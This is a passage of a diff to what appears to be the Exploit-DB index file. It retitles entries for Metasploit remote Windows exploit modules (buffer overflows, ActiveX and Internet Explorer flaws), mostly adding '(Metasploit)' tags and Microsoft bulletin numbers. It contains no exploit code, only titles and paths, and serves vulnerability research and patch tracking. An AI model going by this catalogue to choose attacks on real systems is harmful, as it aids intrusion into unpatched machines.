+16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (3)",2010-11-03,Metasploit,windows,remote,0 16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow (Metasploit)",2010-11-04,Metasploit,windows,remote,0 -16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)",2010-10-05,Metasploit,windows,remote,0 +16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)",2010-10-05,Metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 +16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0 16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -10500,14 +10509,14 @@ id,file,description,date,author,platform,type,port 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16433,platforms/windows/remote/16433.rb,"BomberClone 0.11.6 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 +16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16437,platforms/windows/remote/16437.rb,"Borland Interbase - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 -16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow - SAMI Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 +16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16443,platforms/windows/remote/16443.rb,"Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,0 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -10520,7 +10529,7 @@ id,file,description,date,author,platform,type,port 16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,windows,remote,0 16453,platforms/windows/remote/16453.rb,"Borland Interbase - Create-Request Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)",2010-09-20,Metasploit,windows,remote,0 +16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote,0 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 - Alert Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 @@ -10532,12 +10541,12 @@ id,file,description,date,author,platform,type,port 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16466,platforms/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 -16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit)",2011-01-08,Metasploit,windows,remote,0 -16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)",2011-01-08,Metasploit,windows,remote,0 +16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16473,platforms/windows/remote/16473.rb,"Mercury/32 Mail Server <= 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -10559,7 +10568,7 @@ id,file,description,date,author,platform,type,port 16491,platforms/windows/remote/16491.rb,"WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)",2009-12-06,Metasploit,windows,remote,0 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest debug Buffer Overflow (Metasploit)",2010-09-21,Metasploit,windows,remote,0 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI - ActiveX Control Arbitrary File Download (Metasploit)",2010-12-01,Metasploit,windows,remote,0 -16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 +16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0 16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl - Remote Code Execution (Metasploit)",2011-01-22,Metasploit,multiple,remote,0 16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16497,platforms/windows/remote/16497.rb,"RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -10569,8 +10578,8 @@ id,file,description,date,author,platform,type,port 16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)",2010-09-21,Metasploit,windows,remote,0 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (Metasploit)",2010-07-16,Metasploit,windows,remote,0 -16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 +16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0 +16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote,0 16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0 16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 @@ -10584,79 +10593,79 @@ id,file,description,date,author,platform,type,port 16518,platforms/windows/remote/16518.rb,"Chilkat Crypt - ActiveX WriteFile Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - 'YVerInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger AIM - goaway Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16526,platforms/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0 +16526,platforms/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)",2010-08-12,Metasploit,windows,remote,0 16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow (Metasploit)",2010-05-04,Metasploit,windows,remote,0 16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16529,platforms/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16530,platforms/windows/remote/16530.rb,"mIRC - IRC URL Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (Metasploit)",2011-02-08,Metasploit,windows,remote,0 +16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)",2011-02-08,Metasploit,windows,remote,0 16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan - Client ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16536,platforms/windows/remote/16536.rb,"Green Dam - URL Processing Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0 -16537,platforms/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit)",2010-07-20,Metasploit,windows,remote,0 +16537,platforms/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)",2010-07-20,Metasploit,windows,remote,0 16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace - ActiveX Control Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit)",2010-11-24,Metasploit,windows,remote,0 -16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit)",2010-09-28,Metasploit,windows,remote,0 -16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 +16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - 'epi.dll' AuthCredential Format String (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16545,platforms/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0 +16545,platforms/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)",2010-07-12,Metasploit,windows,remote,0 16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,windows,remote,0 -16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (Metasploit)",2011-01-20,Metasploit,windows,remote,0 +16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)",2011-01-20,Metasploit,windows,remote,0 16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16553,platforms/windows/remote/16553.rb,"BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16554,platforms/windows/remote/16554.rb,"America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0 -16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0 +16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)",2010-07-12,Metasploit,windows,remote,0 16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer - ActiveX Control Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16560,platforms/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16563,platforms/windows/remote/16563.rb,"Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 +16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 16565,platforms/windows/remote/16565.rb,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 -16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16569,platforms/windows/remote/16569.rb,"Orbit Downloader - Connecting Log Creation Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16572,platforms/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16573,platforms/windows/remote/16573.rb,"Macrovision Installshield Update Service - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16574,platforms/windows/remote/16574.rb,"Microsoft Windows - Shell LNK Code Execution (Metasploit)",2010-09-21,Metasploit,windows,remote,0 +16574,platforms/windows/remote/16574.rb,"Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit)",2010-09-21,Metasploit,windows,remote,0 16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16576,platforms/windows/remote/16576.rb,"Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16577,platforms/windows/remote/16577.rb,"CA BrightStor ARCserve Backup - AddColumn() ActiveX Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020)",2010-08-25,Metasploit,windows,remote,0 +16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16584,platforms/windows/remote/16584.rb,"RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16585,platforms/windows/remote/16585.rb,"Sun Java - Web Start Plugin Command Line Argument Injection (Metasploit)",2010-09-21,Metasploit,windows,remote,0 16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer - '.SMIL' Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16587,platforms/windows/remote/16587.rb,"Sun Java - Runtime New Plugin docbase Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (Metasploit)",2010-12-14,Metasploit,windows,remote,0 +16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)",2010-12-14,Metasploit,windows,remote,0 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1)",2010-10-04,Metasploit,windows,remote,0 -16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)",2010-10-04,Metasploit,windows,remote,0 +16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - (VML) Fill Method Code Execution (MS06-055) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16598,platforms/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,windows,remote,0 -16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0 +16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)",2010-07-12,Metasploit,windows,remote,0 16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16602,platforms/windows/remote/16602.rb,"Macrovision Installshield Update Service - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0 @@ -10668,7 +10677,7 @@ id,file,description,date,author,platform,type,port 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata 'in_mp3.dll' - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16616,platforms/windows/remote/16616.rb,"SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol - 